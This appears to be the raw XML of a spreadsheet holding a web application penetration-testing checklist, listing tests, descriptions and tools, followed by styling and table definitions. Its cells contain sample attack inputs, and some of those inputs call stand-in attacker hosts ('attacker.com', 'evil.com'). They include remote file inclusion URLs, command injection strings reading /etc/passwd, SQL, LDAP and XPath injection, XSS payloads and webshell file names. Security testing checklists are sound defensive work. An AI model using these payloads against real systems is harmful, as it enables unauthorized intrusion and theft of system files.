brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.</t>
  </si>
  <si>
    <t>Browser</t>
  </si>
  <si>
    <t>Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection</t>
  </si>
  <si>
    <t>Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?</t>
  </si>
  <si>
    <t>Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
  </si>
  <si>
    <t>Determine the resistance of the application against brute force
password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of
passwords.</t>
  </si>
  <si>
    <t>Testing for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)</t>
  </si>
  <si>
    <t>Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?</t>
  </si>
  <si>
    <t>Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)</t>
  </si>
  <si>
    <t>dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.</t>
  </si>
  <si>
    <t>Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)</t>
  </si>
  <si>
    <t>Force changing parameter value (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t>The application doesn't renew the cookie after a successfully user authentication.</t>
  </si>
  <si>
    <t>Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.</t>
  </si>
  <si>
    <t>SessionID analysis prediction, unencrypted cookie transport, brute-force.</t>
  </si>
  <si>
    <t>Encryption &amp; Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?</t>
  </si>
  <si>
    <t>URL analysis, Direct access to functions without any token.</t>
  </si>
  <si>
    <t>Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.</t>
  </si>
  <si>
    <t>Check reuse session after logout both server-side and SSO.</t>
  </si>
  <si>
    <t>The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.</t>
  </si>
  <si>
    <t>Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF</t>
  </si>
  <si>
    <t>netcat</t>
  </si>
  <si>
    <t>Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.</t>
  </si>
  <si>
    <t>Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.</t>
  </si>
  <si>
    <t>Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP</t>
  </si>
  <si>
    <t>ZAP, HPP Finder (Chrome Plugin)</t>
  </si>
  <si>
    <t>Union, Boolean, Error based, Out-of-band, Time delay.</t>
  </si>
  <si>
    <t>Orascan, SQLInjector</t>
  </si>
  <si>
    <t>Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection</t>
  </si>
  <si>
    <t>SQLMap, Mysqloit, Power Injector</t>
  </si>
  <si>
    <t>Identify MySQL version, Single quote, Information_schema, Read/Write file.</t>
  </si>
  <si>
    <t>Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)</t>
  </si>
  <si>
    <t>SQLMap, SQLninja, Power Injector</t>
  </si>
  <si>
    <t>Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)</t>
  </si>
  <si>
    <t>SQLMap</t>
  </si>
  <si>
    <t>Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner</t>
  </si>
  <si>
    <t>Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.</t>
  </si>
  <si>
    <t>NoSQLMap</t>
  </si>
  <si>
    <t>Identify NoSQL databases, Pass special characters (' " \ ; { } ), Attack with reserved variable name, operator.</t>
  </si>
  <si>
    <t>/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password</t>
  </si>
  <si>
    <t>Hibernate, Nhibernate</t>
  </si>
  <si>
    <t>Check with XML Meta Characters
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG</t>
  </si>
  <si>
    <t>Check for XML error enumeration by supplying a single quote (')
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t>• Presense of .shtml extension
• Check for these characters
&lt; ! # = / . " - &gt; and [a-zA-Z0-9]
• include String = &lt;!--#include virtual="/etc/passwd" --&gt;</t>
  </si>
  <si>
    <t>• Identifying vulnerable parameters with special characters
(i.e.: \, ‘, “, @, #, !, |)
• Understanding the data flow and deployment structure of the client
• IMAP/SMTP command injection (Header, Body, Footer)</t>
  </si>
  <si>
    <t>Enter OS commands in the input field.
?arg=1; system('id')</t>
  </si>
  <si>
    <t>LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)</t>
  </si>
  <si>
    <t>RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page</t>
  </si>
  <si>
    <t>Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.
%3Bcat%20/etc/passwd
test.pdf+|+Dir C:\</t>
  </si>
  <si>
    <t>File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)</t>
  </si>
  <si>
    <t>Burp Proxy, BeEF, MSF</t>
  </si>
  <si>
    <t>Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)</t>
  </si>
  <si>
    <t>• Invalid Input / Empty inputs
• Input that contains non alphanumeric characters or query syn
tax
• Access to internal pages without authentication
• Bypassing application flow</t>
  </si>
  <si>
    <t>Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)</t>
  </si>
  <si>
    <t>testssl.sh, SSL Breacher</t>
  </si>
  <si>
    <t>Compare the responses in three different states:
• Cipher text gets decrypted, resulting data is correct.
• Cipher text gets decrypted, resulting data is garbled and causes
some exception or error handling in the application logic.
• Cipher text decryption fails due to padding errors.</t>
  </si>
  <si>
    <t>PadBuster, Poracle, python-paddingoracle, POET</t>
  </si>
  <si>
    <t>Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)</t>
  </si>
  <si>
    <t>Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for data entry points or hand off points between systems or software.
• Once found try to insert logically invalid data into the application/system. </t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for guessable, predictable or hidden functionality of fields.
• Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow. </t>
  </si>
  <si>
    <t xml:space="preserve">•Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.
• For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.
• Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the busines logic workflow. </t>
  </si>
  <si>
    <t>• Looking for application/system functionality that may
be impacted by time. Such as execution time or actions that
help users predict a future outcome or allow one to circumvent
any part of the business logic or workflow. For example, not
completing transactions in an expected time.
• Develop and execute the mis-use cases ensuring that attackers
can not gain an advantage based on any timing.</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.
• For each method develop a misuse case and try to circumvent or perform an action that is "not acceptable" per the the business logic workflow. </t>
  </si>
  <si>
    <t>• Looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow.
• For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.</t>
  </si>
  <si>
    <t>• Review the project documentation and perform some exploratory testing looking for file types that should be "unsupported" by the application/system.
• Try to upload these “unsupported” files an verify that it are properly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. 
PS. file.phtml, shell.phPWND, SHELL~1.PHP</t>
  </si>
  <si>
    <t xml:space="preserve">• Develop or acquire a known “malicious” file.
• Try to upload the malicious file to the application/system and verify that it is correctly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. </t>
  </si>
  <si>
    <t>Inject JavaScript code:
www.victim.com/?javascript:alert(1)</t>
  </si>
  <si>
    <t>Send malicious HTML code:
?user=&lt;img%20src='aaa'%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Modify untrusted URL input to a malicious site: (Open Redirect)
?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t>Burp Proxy, DOMinator</t>
  </si>
  <si>
    <t>Inject code in the CSS context :
•  www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
•  www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)</t>
  </si>
  <si>
    <t>External JavaScript could be easily injected in the trusted web site
www.victim.com/#http://evil.com/js.js</t>
  </si>
  <si>
    <t>Check the HTTP headers in order to understand how CORS is
used (Origin Header)</t>
  </si>
  <si>
    <t>Burp Proxy, ClickjackingTool</t>
  </si>
  <si>
    <t>Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.</t>
  </si>
  <si>
    <t>Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains</t>
  </si>
  <si>
    <t>Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.Use Google Chrome's Developer Tools to view the Network WebSocket communication. Check Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization</t>
  </si>
  <si>
    <t>Burp proxy, ZAP</t>
  </si>
  <si>
    <t>Burp proxy, ZAP, Tamper data</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, curl</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Nikto</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>Browser, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Hydra</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Firefox add-on CacheViewer2</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Wfuzz</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Xenotix XSS</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, BeEF, XSS Proxy</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, netcat</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Curl</t>
  </si>
  <si>
    <t>Burp Proxy, Chrome, ZAP, WebSocket Client</t>
  </si>
  <si>
    <t>Determine whether the website is storing sensitive data in the storage. XSS in localstorage 
http://server/StoragePOC.html#&lt;img src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>Chrome, Firebug, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>Immunity Canvas, Spike, MSF, Nessus</t>
  </si>
  <si>
    <t>Whatweb, BlindElephant, Wappalyzer, CMSmap</t>
  </si>
  <si>
    <t>Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue</t>
  </si>
  <si>
    <t>FlashBang, Flare, Flasm, SWFScan, SWF Intruder</t>
  </si>
  <si>
    <t>Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)</t>
  </si>
  <si>
    <t>Burp Proxy, fimap, Liffy</t>
  </si>
  <si>
    <t>Burp Proxy (Autorize), ZAP</t>
  </si>
  <si>
    <t>Burp Proxy, ForceSSL, ZAP, CookieDigger</t>
  </si>
  <si>
    <t>Burp Proxy (csrf_token_detect), burpy, ZAP</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Commix</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Liffy, Panoptic</t>
  </si>
  <si>
    <t>No technical skills [1]</t>
  </si>
  <si>
    <t>Some technical skills [3]</t>
  </si>
  <si>
    <t>Advanced computer user [5]</t>
  </si>
  <si>
    <t>Network and programming skills [6]</t>
  </si>
  <si>
    <t>Security penetration skills [9]</t>
  </si>
  <si>
    <t>Public knowledge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</si>
</sst>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x14ac:knownFonts="1">
    <font>
      <sz val="10"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF333333"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color indexed="81"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF333333"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="10">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7030A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64">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>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0" borderId="0" xfId="0"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6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="7" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="8" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="8" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="8" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0"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6" fillId="8" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
    <xf numFmtId="0" fontId="21" fillId="9" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="7" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="8" borderId="2"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16" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="8" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="126">
    <dxf>
      <font>
        <b/>
        <i val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF92D050"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFF00"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFC000"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFF0000"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF7030A0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF7030A0"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>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indexed="23"/>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relative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4:F14" totalsRowShown="0" headerRowDxfId="81">
  <autoFilter ref="A4:F14"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Information Gathering" dataDxfId="80"/>
    <tableColumn id="2" name="Test Name" dataDxfId="79"/>
    <tableColumn id="3" name="Description" dataDxfId="78"/>
    <tableColumn id="4" name="Tools" dataDxfId="77"/>
    <tableColumn id="5" name="Result" dataDxfId="76"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table10.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="14" name="Table61415" displayName="Table61415" ref="A96:F99" totalsRowShown="0" headerRowDxfId="27">
  <autoFilter ref="A96:F99"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Cryptography" dataDxfId="26"/>
    <tableColumn id="2" name="Test Name" dataDxfId="25"/>
    <tableColumn id="3" name="Description" dataDxfId="24"/>
    <tableColumn id="4" name="Tools" dataDxfId="23"/>
    <tableColumn id="5" name="Result" dataDxfId="22"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table11.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="15" name="Table616" displayName="Table616" ref="A112:F124" totalsRowShown="0" headerRowDxfId="21">
  <autoFilter ref="A112:F124"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Client Side Testing" dataDxfId="20"/>
    <tableColumn id="2" name="Test Name" dataDxfId="19"/>
    <tableColumn id="3" name="Description" dataDxfId="18"/>
    <tableColumn id="4" name="Tools" dataDxfId="17"/>
    <tableColumn id="5" name="Result" dataDxfId="16"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table2.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="2" name="Table2" displayName="Table2" ref="A16:F24" totalsRowShown="0" headerRowDxfId="75">
  <autoFilter ref="A16:F24"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Configuration and Deploy Management Testing" dataDxfId="74"/>
    <tableColumn id="2" name="Test Name" dataDxfId="73"/>
    <tableColumn id="3" name="Description" dataDxfId="72"/>
    <tableColumn id="4" name="Tools" dataDxfId="71"/>
    <tableColumn id="5" name="Result" dataDxfId="70"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table3.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="3" name="Table3" displayName="Table3" ref="A35:F45" totalsRowShown="0" headerRowDxfId="69">
  <autoFilter ref="A35:F45"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Authentication Testing" dataDxfId="68"/>
    <tableColumn id="2" name="Test Name" dataDxfId="67"/>
    <tableColumn id="3" name="Description" dataDxfId="66"/>
    <tableColumn id="4" name="Tools" dataDxfId="65"/>
    <tableColumn id="5" name="Result" dataDxfId="64"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
